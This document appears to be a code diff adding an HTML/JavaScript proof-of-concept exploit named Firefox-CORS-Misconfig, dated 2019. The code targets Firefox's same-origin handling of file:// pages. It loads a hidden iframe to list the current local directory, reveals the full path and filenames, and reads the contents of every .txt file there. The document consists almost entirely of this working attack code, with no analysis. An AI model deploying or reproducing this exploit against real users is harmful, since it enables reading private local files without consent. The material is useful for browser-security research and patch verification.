Voorivex · July 4, 2019 08:26 · Jul 4, 2019
diff --git a/Firefox-CORS-Misconfig.js b/Firefox-CORS-Misconfig.js
@@ -0,0 +1,121 @@
+<html>
+<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
+<meta content="utf-8" http-equiv="encoding">
+
+<body onload="CreateListReaderIframe()">
+
+    <script>
+
+        function CreateListReaderIframe() {
+            var ifr = document.createElement("iframe");
+            ifr.src = "."
+            ifr.id = "ifr"
+            ifr.style = "width:0%; height:0%; border: 0"
+
+            ifr.onload = function() {
+                Check(ifr)
+            }
+
+            document.body.append(ifr);
+
+        }
+
+
+
+
+        function Check(ifr) {
+
+            if (ifr.contentDocument == null) { //SOP not bypassed.Trying to bypass it by opening current directory.
+
+                location = "."
+
+            } else { //SOP bypassed,Reading list of files and directories in the current directory...
+
+                var CWD_Contents = ifr.contentDocument.body.innerText
+                ExtractFilesAndDirectories(CWD_Contents)
+
+            }
+
+        }
+
+
+
+
+        function ExtractFilesAndDirectories(CWD_Contents) {
+
+            var lines = CWD_Contents.split("\n")
+
+            document.write("Same Origion Policy was bypassed! We can list contents of current directory for reading them.<br>")
+            document.write("<br>" + "-".repeat(400) + "<br>")
+
+            Full_Path = lines[0].replace("Index of file://", "")
+            document.write("Full path of current directory: " + Full_Path + "<br><br>")
+            document.write("<br>" + "-".repeat(400) + "<br>")
+
+            lines.splice(0, 5)
+            tempArr = []
+            lines.forEach(function(line) {
+                if (line != "") {
+                    tempArr.push(line)
+                }
+
+            })
+
+            lines = tempArr
+            len = lines.length
+            tempArr = []
+            for (i = 0; i < len; i++) {
+
+                if (i != len - 1) {
+                    tempArr.push(lines[i] + " " + lines[i + 1])
+                    i++;
+                }
+
+            }
+
+            lines = tempArr
+            files_and_directories = lines.join("<br>")
+
+            document.write("Contents of current directory extracted:<br><br>")
+            document.write(files_and_directories)
+            document.write("<br>" + "-".repeat(400) + "<br>")
+
+            document.write("<br><br>Reading text files (.txt) in the current directory :<br><br>")
+
+            lines.forEach(function(line) {
+                if (line.indexOf(".txt") != -1) {
+                    txt_filename = line.split(" ")[0]
+                    ReadFile(txt_filename)
+                }
+
+            })
+
+
+        }
+
+
+
+
+        function ReadFile(filename) {
+            var xhr = new XMLHttpRequest();
+
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState == 4 && xhr.status == 200) {
+                    file_contents = xhr.responseText
+                    document.write("Conntents of " + filename + ":<br>")
+                    document.body.innerText += file_contents
+                    document.write("<br>" + "-".repeat(400) + "<br>")
+                }
+            }
+
+            xhr.open("GET", filename);
+            xhr.send();
+        }
+
+
+
+    </script>
+
+</body>
+
+</html>